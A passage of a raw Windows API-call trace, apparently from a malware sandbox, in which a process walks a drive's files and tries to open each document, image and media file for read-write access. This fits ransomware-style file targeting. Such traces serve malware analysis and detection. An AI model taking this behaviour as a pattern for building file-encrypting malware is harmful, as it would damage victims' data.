dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hMbpJsxUxLqdU43X.rtf", cAlternateFileName="")) returned 1 [0182.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.195] PathFindExtensionW (pszPath="Z:\\hMbpJsxUxLqdU43X.rtf") returned=".rtf" [0182.199] CreateFileW (lpFileName="Z:\\hMbpJsxUxLqdU43X.rtf" (normalized: "z:\\hmbpjsxuxlqdu43x.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.206] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7967, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mUs3U.jpg", cAlternateFileName="")) returned 1 [0182.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.206] PathFindExtensionW (pszPath="Z:\\mUs3U.jpg") returned=".jpg" [0182.210] CreateFileW (lpFileName="Z:\\mUs3U.jpg" (normalized: "z:\\mus3u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.213] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1057a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="noIQIeDYAhP.m4a", cAlternateFileName="")) returned 1 [0182.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.213] PathFindExtensionW (pszPath="Z:\\noIQIeDYAhP.m4a") returned=".m4a" [0182.217] CreateFileW (lpFileName="Z:\\noIQIeDYAhP.m4a" (normalized: "z:\\noiqiedyahp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.218] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V7AkBxJ.rtf", cAlternateFileName="")) returned 1 [0182.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.218] PathFindExtensionW (pszPath="Z:\\V7AkBxJ.rtf") returned=".rtf" [0182.222] CreateFileW (lpFileName="Z:\\V7AkBxJ.rtf" (normalized: "z:\\v7akbxj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.223] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXMaDbExzV3GNxn.rtf", cAlternateFileName="")) returned 1 [0182.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.223] PathFindExtensionW (pszPath="Z:\\nXMaDbExzV3GNxn.rtf") returned=".rtf" [0182.227] CreateFileW (lpFileName="Z:\\nXMaDbExzV3GNxn.rtf" (normalized: "z:\\nxmadbexzv3gnxn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.228] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05sv4vlauTjO82QKoH.odp", cAlternateFileName="")) returned 1 [0182.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.228] PathFindExtensionW (pszPath="Z:\\05sv4vlauTjO82QKoH.odp") returned=".odp" [0182.232] CreateFileW (lpFileName="Z:\\05sv4vlauTjO82QKoH.odp" (normalized: "z:\\05sv4vlautjo82qkoh.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.232] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e0Lune6IQDhr.swf", cAlternateFileName="")) returned 1 [0182.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.233] PathFindExtensionW (pszPath="Z:\\e0Lune6IQDhr.swf") returned=".swf" [0182.236] CreateFileW (lpFileName="Z:\\e0Lune6IQDhr.swf" (normalized: "z:\\e0lune6iqdhr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xef2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UWPd5V722.jpg", cAlternateFileName="")) returned 1 [0182.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.237] PathFindExtensionW (pszPath="Z:\\UWPd5V722.jpg") returned=".jpg" [0182.241] CreateFileW (lpFileName="Z:\\UWPd5V722.jpg" (normalized: "z:\\uwpd5v722.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3vXkT9bZW2wQG2nOsz.flv", cAlternateFileName="")) returned 1 [0182.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.242] PathFindExtensionW (pszPath="Z:\\3vXkT9bZW2wQG2nOsz.flv") returned=".flv" [0182.246] CreateFileW (lpFileName="Z:\\3vXkT9bZW2wQG2nOsz.flv" (normalized: "z:\\3vxkt9bzw2wqg2nosz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.247] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x173b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rSvaTPcyuRZ.avi", cAlternateFileName="")) returned 1 [0182.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.247] PathFindExtensionW (pszPath="Z:\\rSvaTPcyuRZ.avi") returned=".avi" [0182.250] CreateFileW (lpFileName="Z:\\rSvaTPcyuRZ.avi" (normalized: "z:\\rsvatpcyurz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.251] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x52b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BEWCWMGvP7.odp", cAlternateFileName="")) returned 1 [0182.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.252] PathFindExtensionW (pszPath="Z:\\BEWCWMGvP7.odp") returned=".odp" [0182.255] CreateFileW (lpFileName="Z:\\BEWCWMGvP7.odp" (normalized: "z:\\bewcwmgvp7.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.256] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb7f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERBbBrh6.mp3", cAlternateFileName="")) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.257] PathFindExtensionW (pszPath="Z:\\ERBbBrh6.mp3") returned=".mp3" [0182.265] CreateFileW (lpFileName="Z:\\ERBbBrh6.mp3" (normalized: "z:\\erbbbrh6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.267] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x968a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYeVSPPEdjtBCAgcD.m4a", cAlternateFileName="")) returned 1 [0182.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.267] PathFindExtensionW (pszPath="Z:\\cYeVSPPEdjtBCAgcD.m4a") returned=".m4a" [0182.272] CreateFileW (lpFileName="Z:\\cYeVSPPEdjtBCAgcD.m4a" (normalized: "z:\\cyevsppedjtbcagcd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.273] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf715, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t0dVU7jjqdjfnF7OmqO.png", cAlternateFileName="")) returned 1 [0182.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.273] PathFindExtensionW (pszPath="Z:\\t0dVU7jjqdjfnF7OmqO.png") returned=".png" [0182.276] CreateFileW (lpFileName="Z:\\t0dVU7jjqdjfnF7OmqO.png" (normalized: "z:\\t0dvu7jjqdjfnf7omqo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.278] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc295, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wPgITKWMM0.rtf", cAlternateFileName="")) returned 1 [0182.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.278] PathFindExtensionW (pszPath="Z:\\wPgITKWMM0.rtf") returned=".rtf" [0182.281] CreateFileW (lpFileName="Z:\\wPgITKWMM0.rtf" (normalized: "z:\\wpgitkwmm0.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.283] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DTakzSmlzvmIUv.mp3", cAlternateFileName="")) returned 1 [0182.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.283] PathFindExtensionW (pszPath="Z:\\4DTakzSmlzvmIUv.mp3") returned=".mp3" [0182.289] CreateFileW (lpFileName="Z:\\4DTakzSmlzvmIUv.mp3" (normalized: "z:\\4dtakzsmlzvmiuv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.290] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aYwQj9EW4jZuUePCOt1y.jpg", cAlternateFileName="")) returned 1 [0182.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.290] PathFindExtensionW (pszPath="Z:\\aYwQj9EW4jZuUePCOt1y.jpg") returned=".jpg" [0182.296] CreateFileW (lpFileName="Z:\\aYwQj9EW4jZuUePCOt1y.jpg" (normalized: "z:\\aywqj9ew4jzuuepcot1y.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.297] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzhCnO8TQqI.avi", cAlternateFileName="")) returned 1 [0182.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.298] PathFindExtensionW (pszPath="Z:\\hzhCnO8TQqI.avi") returned=".avi" [0182.303] CreateFileW (lpFileName="Z:\\hzhCnO8TQqI.avi" (normalized: "z:\\hzhcno8tqqi.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.305] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd6af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0fyyBWfRWm61u1MhJ.doc", cAlternateFileName="")) returned 1 [0182.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.305] PathFindExtensionW (pszPath="Z:\\0fyyBWfRWm61u1MhJ.doc") returned=".doc" [0182.311] CreateFileW (lpFileName="Z:\\0fyyBWfRWm61u1MhJ.doc" (normalized: "z:\\0fyybwfrwm61u1mhj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.312] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hExQispuuoymhG1i192v.ppt", cAlternateFileName="")) returned 1 [0182.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.313] PathFindExtensionW (pszPath="Z:\\hExQispuuoymhG1i192v.ppt") returned=".ppt" [0182.318] CreateFileW (lpFileName="Z:\\hExQispuuoymhG1i192v.ppt" (normalized: "z:\\hexqispuuoymhg1i192v.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.320] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x100ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VQa7D2fVvyShxsM.xlsx", cAlternateFileName="")) returned 1 [0182.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.320] PathFindExtensionW (pszPath="Z:\\VQa7D2fVvyShxsM.xlsx") returned=".xlsx" [0182.326] CreateFileW (lpFileName="Z:\\VQa7D2fVvyShxsM.xlsx" (normalized: "z:\\vqa7d2fvvyshxsm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.327] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc9b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nVlM8WgmSnZtiC.avi", cAlternateFileName="")) returned 1 [0182.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.327] PathFindExtensionW (pszPath="Z:\\nVlM8WgmSnZtiC.avi") returned=".avi" [0182.333] CreateFileW (lpFileName="Z:\\nVlM8WgmSnZtiC.avi" (normalized: "z:\\nvlm8wgmsnztic.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.335] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12fc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6614ZQjKlVVwMsRoTm.pdf", cAlternateFileName="")) returned 1 [0182.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 